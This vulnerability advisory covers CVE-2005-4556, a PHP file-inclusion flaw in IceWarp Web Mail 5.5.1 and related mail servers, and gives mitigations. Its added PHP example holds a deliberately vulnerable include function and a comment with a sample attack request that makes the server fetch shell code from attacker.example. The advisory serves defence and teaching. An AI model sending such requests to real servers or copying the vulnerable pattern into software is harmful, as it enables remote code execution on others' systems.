PT-2005-5226 · Icewarp · Icewarp Web Mail+2

Published: 2005-12-28
Updated: 2018-10-19
CVE: CVE-2005-4556
CVSS v2.0: 7.5 (High)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Name of the Vulnerable Software and Affected Versions
IceWarp Web Mail version 5.5.1
Merak Mail Server version 8.3.0r
VisNetic Mail Server version 8.3.0 build 1
Description
Multiple PHP file inclusion vulnerabilities allow remote attackers to include arbitrary local and remote PHP files via a URL or path supplied in the lang_settings and language parameters of certain PHP files, specifically accounts/inc/include.php and admin/inc/include.php, when PHP's register_globals directive is enabled. With register_globals on, every request parameter becomes a PHP variable before the script runs, so a value placed in these parameters reaches an include statement unchecked: a remote URL makes the server fetch and execute attacker-hosted code (allow_url_fopen permitting), and a local path discloses or executes any file the web server can read. No authentication is required, which is why the CVSS vector carries Au:N with partial impact on confidentiality, integrity and availability.
Recommendations
Merak Mail Server 8.3.0r and VisNetic Mail Server 8.3.0 build 1 ship the same IceWarp Web Mail 5.5.1 component, so the measures below apply to all three products. Apply the vendor's update if one is available. Until then: disable register_globals in php.ini (or with php_flag in the webmail directory's .htaccess, which works because the directive is PHP_INI_PERDIR), which removes the path by which the lang_settings and language parameters become variables; disable allow_url_fopen in php.ini or httpd.conf (it is PHP_INI_SYSTEM and cannot be set from .htaccess) to block the remote form of the attack, keeping in mind that local file inclusion remains possible; and deny direct HTTP requests to accounts/inc/include.php and admin/inc/include.php, which are meant to be included by other scripts rather than requested by a browser. If the webmail front end is not needed on an exposed interface, remove it from that interface.
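The following block is an added illustration and is not IceWarp's code; the page does not show the vulnerable source. It reconstructs the bug class described above (an include() whose path is assembled from variables that register_globals seeds from the request) beside a hardened form that implements the recommendations in code. The parameter names lang_settings and language come from the advisory; the directory layout, language file names, and the function names vulnerable_include_language and safe_include_language are assumptions made for this example.

```php
<?php
// Added example, not IceWarp's code. Reconstructs the bug class in
// CVE-2005-4556: include() with a request-controlled path via register_globals.
// $lang_settings / $language follow the advisory; everything else is assumed.

// ---- Vulnerable pattern (register_globals = On) --------------------------
// With register_globals on, PHP turns ?lang_settings=X&language=Y into the
// globals $lang_settings and $language before this script runs. A request like
//   include.php?lang_settings=http://attacker.example/shell.txt%3F&language=en
// makes include() fetch and execute the remote file when allow_url_fopen is on;
// a local path in the same parameter includes a file from the server instead.
function vulnerable_include_language()
{
    global $lang_settings, $language;   // attacker-seeded by register_globals
    include $lang_settings . '/' . $language . '.php';
}

// ---- Hardened pattern ----------------------------------------------------
// 1. Read the parameter explicitly; never depend on register_globals.
// 2. Map the request value through an allowlist of known language codes, so
//    the request never contributes characters to the include path at all.
// 3. Resolve the final path with realpath() and confirm it stays under the
//    language directory; a URL or a traversal sequence cannot pass this check.
function safe_include_language(array $request, $langDir)
{
    $languages = array('en' => 'english.php', 'de' => 'german.php'); // assumed names
    $code = (isset($request['language']) && is_string($request['language']))
        ? $request['language'] : 'en';
    if (!isset($languages[$code])) {
        $code = 'en';                   // unknown code: fall back, never echo it
    }
    $baseReal = realpath($langDir);
    $path = realpath($langDir . DIRECTORY_SEPARATOR . $languages[$code]);
    if ($baseReal === false || $path === false) {
        return false;                   // directory or file missing: fail closed
    }
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return false;                   // resolved outside the language directory
    }
    include $path;
    return true;
}

// ---- Deployment guard ----------------------------------------------------
// register_globals is PHP_INI_PERDIR and cannot be turned off from script code
// (it was removed entirely in PHP 5.4), so the script can only detect it and
// refuse to serve the page until the configuration is fixed.
if (filter_var(ini_get('register_globals'), FILTER_VALIDATE_BOOLEAN)) {
    header('HTTP/1.1 500 Internal Server Error');
    exit('register_globals is enabled; refusing to run');
}

// Typical call site: the language comes from $_GET, the directory is fixed.
safe_include_language($_GET, __DIR__ . DIRECTORY_SEPARATOR . 'lang');
```

The allowlist is the decisive change: after it, the request selects an entry in a fixed table rather than supplying path characters, so realpath() is a second line of defence rather than the only one. The deployment-level counterpart is `php_flag register_globals Off` in the webmail's .htaccess or php.ini, `allow_url_fopen = Off` in php.ini or httpd.conf, and an Apache `<Files include.php>` block with `Deny from all` (or `Require all denied` on Apache 2.4) in the accounts/inc and admin/inc directories so the include files cannot be requested directly.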


Related Identifiers

CVE-2005-4556

Affected Products

Icewarp Web Mail
Merak Mail Server
Visnetic Mail Server